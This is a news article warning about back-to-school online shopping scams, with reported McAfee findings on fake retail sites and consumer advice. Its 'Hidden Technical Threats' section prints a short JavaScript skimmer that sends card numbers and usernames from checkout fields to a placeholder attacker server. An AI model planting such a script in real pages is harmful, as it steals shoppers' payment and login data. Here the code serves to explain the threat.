Back-to-School Shopping Scams Surge as Cybercriminals Exploit Seasonal Rush
As families nationwide gear up for the school season, cybercriminals are taking advantage of the increased demand for online shopping with a wave of advanced scams.
Rising Online Threats During Seasonal Spending
Criminals are leveraging higher shopping activity to launch malicious campaigns that target individuals searching for discounts and exclusive deals. Reports reveal a growing presence of fake retail websites, fraudulent delivery alerts, and deceptive phishing emails designed to steal payment and personal information.
How These Scams Work
Unlike traditional scams, this year’s campaign is marked by highly convincing fake websites spread through sponsored search ads, email promotions, and especially social media advertisements.
These counterfeit ads promise massive savings on items ranging from school supplies to expensive electronics. Many of these websites use AI-generated visuals to closely imitate legitimate online retailers. Victims often realize the fraud only after losing money or exposing sensitive data.
Research Findings from McAfee
McAfee analysts detected this trend in early August after observing a surge in user complaints and threat data. Their findings show that scammers use automated systems to mass-produce fake shopping sites.
Each fraudulent site uses randomized domain names and SSL certificates to appear trustworthy while avoiding simple detection methods. Combined with aggressive social media promotion, these tactics help attackers funnel huge volumes of unsuspecting users to their fake platforms.
Hidden Technical Threats
McAfee researchers also uncovered malicious JavaScript code embedded within checkout pages. This script silently transmits stolen login details and credit card numbers to attacker-controlled servers. Often, the data is encrypted to bypass network defenses.
Example of the hidden script pattern:
(function(){
var xhr=new XMLHttpRequest();
xhr.open('POST','https://malicious-server.com/collect',true);
xhr.setRequestHeader('Content-Type','application/json');
xhr.send(JSON.stringify({card:document.getElementById('cc_num').value,user:document.getElementById('usr').value}));
})();
This method not only enables instant theft of sensitive information but also allows cybercriminals to maintain long-term access to compromised accounts.
Protecting Against Back-to-School Scams
As the school season progresses, individuals—especially those drawn in by unfamiliar online stores or urgent promotional offers—remain highly vulnerable. Staying cautious, verifying retailers, and avoiding suspicious ads are key steps to minimizing the risk of falling victim.


